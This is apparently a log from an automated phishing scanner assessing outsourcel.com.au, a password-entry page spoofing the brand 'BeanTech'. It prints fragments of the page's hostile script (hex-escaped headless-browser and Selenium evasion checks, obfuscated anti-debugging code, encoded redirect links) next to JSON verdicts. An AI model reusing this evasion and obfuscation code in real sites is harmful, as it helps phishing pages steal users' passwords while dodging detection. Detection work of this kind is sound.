E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x6E\x6F\x77\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x74\x69\x6D\x65\x20\x3D\x20\x6E\x6F\x77\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x69\x6D\x65\x20\x2B\x3D\x20\x33\x30\x30\x20\x2A\x20\x31\x30\x30\x30\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6E\x6F\x77\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x74\x69\x6D\x65\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\x27\x5A\x32\x38\x54\x43\x47\x67\x79\x6B\x73\x41\x79\x6E\x39\x77\x38\x70\x71\x47\x56\x70\x6B\x63\x57\x39\x44\x55\x3D\x32\x34\x56\x35\x66\x64\x5F\x53\x71\x47\x66\x79\x6E\x43\x73\x48\x6D\x41\x4A\x62\x6C\x39\x79\x53\x6E\x64\x41\x27\x20\x2B\x20\x27\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x57\x65\x64\x2C\x20\x30\x38\x2D\x4A\x61\x6E\x2D\x32\x35\x20\x31\x32\x3A\x32\x39\x3A\x34\x37\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x70\x75\x7A\x7A\x6C\x65\x20\x66\x6F\x72\x20\x62\x72\x6F\x77\x73\x65\x72\x20\x74\x6F\x20\x66\x69\x67\x75\x72\x65\x20\x6F\x75\x74\x20\x74\x6F\x20\x67\x65\x74\x20\x61\x6E\x73\x77\x65\x72\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x70\x68\x61\x6E\x74\x6F\x6D\x20\x7C\x7C\x20\x21\x77\x69\x6E\x64\x6F\x77\x2E\x63\x61\x6C\x6C\x50\x68\x61\x6E\x74\x6F\x6D\x29\x7B\x2F\x2A\x70\x68\x61\x6E\x74\x6F\x6D\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x5F\x5F\x70\x68\x61\x6E\x74\x6F\x6D\x61\x73\x29\x7B\x2F\x2A\x70\x68\x61\x6E\x74\x6F\x6D\x61\x73\x20\x50\x68\x61\x6E\x74\x6F\x6D\x4A\x53\x2D\x62\x61\x73\x65\x64\x20\x77\x65\x62\x20\x70\x65\x72\x66\x20\x6D\x65\x74\x72\x69\x63\x73\x20\x2B\x20\x6D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67\x20\x74\x6F\x6F\x6C\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x42\x75\x66\x66\x65\x72\x29\x7B\x2F\x2A\x6E\x6F\x64\x65\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x77\x65\x62\x64\x72\x69\x76\x65\x72\x29\x7B\x2F\x2A\x73\x65\x6C\x65\x6E\x69\x75\x6D\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E

{
    "risk_score": 9,
    "reasoning": "This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be attempting to redirect the user to an unknown or suspicious domain, which further increases the risk. Overall, this script demonstrates a clear pattern of malicious behavior and should be considered a high-risk threat."
}

    var link = "RlRieXJQYXJIaEpHTjA1MXpDNWVrVXdEcEh1RThndVVLc3RKYkk3ZlBPanRVbXhobGRWNXFub0dPTDZjZGp3VGJScUhhMkZOU3RGeUpEWGs2c25qTXZpVlFLb0lBQURNcGNab25nY1c0cXg5OENlWjFCMTdsRTQ0UmRZWG1ZTGdDVDNWR1EwM1NTUlA4d1c2QWhyTnB5";
    var random = "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfT2ZmaWNlX01peA==";
    var autograb = false;
    const _0x370772=_0x4de9;(function(_0x4f6b79,_0x5e87a3){const _0x23902b=_0x4de9,_0x1aa4ca=_0x4f6b79();while(!![]){try{const _0x4ecf9d=parseInt(_0x23902b(0x1f2))/0x1*(-parseInt(_0x23902b(0x1ff))/0x2)+parseInt(_0x23902b(0x202))/0x3+parseInt(_0x23902b(0x201))/0x4*(parseInt(_0x23902b(0x215))/0x5)+parseInt(_0x23902b(0x210))/0x6+-parseInt(_0x23902b(0x200))/0x7*(-parseInt(_0x23902b(0x1fe))/0x8)+-parseInt(_0x23902b(0x1f8))/0x9+-parseInt(_0x23902b(0x1ed))/0xa*(parseInt(_0x23902b(0x1fd))/0xb);if(_0x4ecf9d===_0x5e87a3)break;else _0x1aa4ca['push'](_0x1aa4ca['shift']());}catch(_0x5e20f3){_0x1aa4ca['push'](_0x1aa4ca['shift']());}}}(_0x5cca,0xe5b41));const _0x6d4a3c=(function(){let _0x5cc2bf=!![];return function(_0x9b77da,_0x135712){const _0xf77bb9=_0x5cc2bf?function(){const _0xec2e23=_0x4de9;if(_0x135712){const _0x101ef2=_0x135712[_0xec2e23(0x204)](_0x9b77da,arguments);return _0x135712=null,_0x101ef2;}}:function(){};return _0x5cc2bf=![],_0xf77bb9;};}()),_0x487215=_0x6d4a3c(this,function(){const _0x34a2de=_0x4de9;return _0x487215[_0x34a2de(0x1f3)]()['search'](_0x34a2de(0x1ee))[_0x34a2de(0x1f3)]()[_0x34a2de(0x212)](_0x487215)['search'](_0x34a2de(0x1ee));});_0x487215();const _0x5dbfa7=(function(){let _0x4b0e96=!![];return function(_0xd5d4f3,_0xaef652){const _0x53ffda=_0x4b0e96?function(){if(_0xaef652){const _0x48e2d4=_0xaef652['apply'](_0xd5d4f3,arguments);return _0xaef652=null,_0x48e2d4;}}:function(){};return _0x4b0e96=![],_0x53ffda;};}());(function(){_0x5dbfa7(this,function(){const _0x13ac30=_0x4de9,_0x97b71d=new RegExp('function\x20*\x5c(\x20*\x5c)'),_0x562d3b=new RegExp(_0x13ac30(0x1f7),'i'),_0x4d3b42=_0x3d6ca4(_0x13ac30(0x1fb));!_0x97b71d[_0x13ac30(0x20c)](_0x4d3b42+'chain')||!_0x562d3b[_0x13ac30(0x20c)](_0x4d3b42+'input')?_0x4d3b42('0'):_0x3d6ca4();})();}());const _0x55444a=(function(){let _0x33f15b=!![];return function(_0x57a666,_0x260f9d){const _0x31c56e=_0x33f15b?function(){const _0x59e2eb=_0x4de9;if(_0x260f9d){const _0xb3158f=_0x260f9d[_0x59e2eb(0x204)](_0x57a666,arguments);return _0x260f9d=null,_0xb3158f;}}:function(){};return _0x33f15b=![],_0x31c56e;};}()),_0x4f3632=_0x55444a(this,function(){const _0x2ff6f3=_0x4de9,_0x330ee3=function(){const _0x1dd09b=_0x4de9;let _0x14d87b;try{_0x14d87b=Function('return\x20(function()\x20'+_0x1dd09b(0x218)+');')();}catch(_0x4d6905){_0x14d87b=window;}return _0x14d87b;},_0x131a47=_0x330ee3(),_0x18e009=_0x131a47[_0x2ff6f3(0x206)]=_0x131a47[_0x2ff6f3(0x206)]||{},_0x1706ee=[_0x2ff6f3(0x205),_0x2ff6f3(0x216),'info',_0x2ff6f3(0x203),_0x2ff6f3(0x1f5),_0x2ff6f3(0x1f4),_0x2ff6f3(0x207)];for(let _0x3a4ef4=0x0;_0x3a4ef4<_0x1706ee[_0x2ff6f3(0x1f1)];_0x3a4ef4++){const _0x5abefa=_0x55444a[_0x2ff6f3(0x212)][_0x2ff6f3(0x20e)]['bind'](_0x55444a),_0x2ee7c2=_0x1706ee[_0x3a4ef4],_0x5e394d=_0x18e009[_0x2ee7c2]||_0x5abefa;_0x5abefa[_0x2ff6f3(0x1f6)]=_0x55444a[_0x2ff6f3(0x208)](_0x55444a),_0x5abefa[_0x2ff6f3(0x1f3)]=_0x5e394d['toString'][_0x2ff6f3(0x208)](_0x5e394d),_0x18e009[_0x2ee7c2]=_0x5abefa;}});function _0x5cca(){const _0x49775a=['trace','bind','onload','Error\x20encoding\x20string.','/index?a=','test','while\x20(true)\x20{}','prototype','stateObject','7057404VGAaEh','location','constructor','/index','gger','4989590fceNiz','warn','string','{}.constructor(\x22return\x20this\x22)(\x20)','action','href','2800XoTiRS','(((.+)+)+)+$','call','substring','length','1nDTKwE','toString','table','exception','__proto__','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','945234wBsndJ','counter','hash','init','debu','155078irFNIr','8BAihSD','952052hXXCrM','11247859baQcXU','4QpQeNS','5065104jKIhEm','error','apply','log','console'];_0x5cca=function(){return _0x49775a;};return _0x5cca()

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://outsourcel.com.au

{
  "contains_trigger_text": true,
  "trigger_text": "Enter password",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "Enter password",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "BeanTech"
  ]
}

{
  "brands": [
    "BeanTech"
  ]
}

```json{  "legit_domain": "beantech.com",  "classification": "unknown",  "reasons": [    "The brand 'BeanTech' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.",    "The URL 'outsourcel.com.au' does not match the expected domain for 'BeanTech', which would likely be 'beantech.com'.",    "The domain 'outsourcel.com.au' does not contain any recognizable elements related to 'BeanTech'.",    "The presence of a password input field on a domain that does not match the brand's expected domain is suspicious.",    "The domain uses a '.com.au' extension, which is not inherently suspicious but does not align with the expected domain for 'BeanTech'."  ],  "riskscore": 8}

URL: outsourcel.com.au
			Brands: BeanTech
			Input Fields: Password

{
  "contains_trigger_text": true,
  "trigger_text": "Enter password",
  "prominent_button_name": "Sign in",
  "text_input_field_labels": [
    "Password"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "BeanTech"
  ]
}

```json{  "legit_domain": "beantech.com",  "classification": "unknown",  "reasons": [    "The brand 'BeanTech' is not widely recognized, making it difficult to classify as 'known' or 'wellknown'.",    "The URL 'outsourcel.com.au' does not match the expected domain for 'BeanTech', which would likely be 'beantech.com'.",    "The domain 'outsourcel.com.au' does not contain any recognizable elements related to 'BeanTech'.",    "The presence of a password input field on a domain that does not match the brand's expected domain is suspicious.",    "The domain uses a '.com.au' extension, which is not inherently suspicious but does not align with the expected domain for 'BeanTech'."  ],  "riskscore": 8}

URL: outsourcel.com.au
			Brands: BeanTech
			Input Fields: Password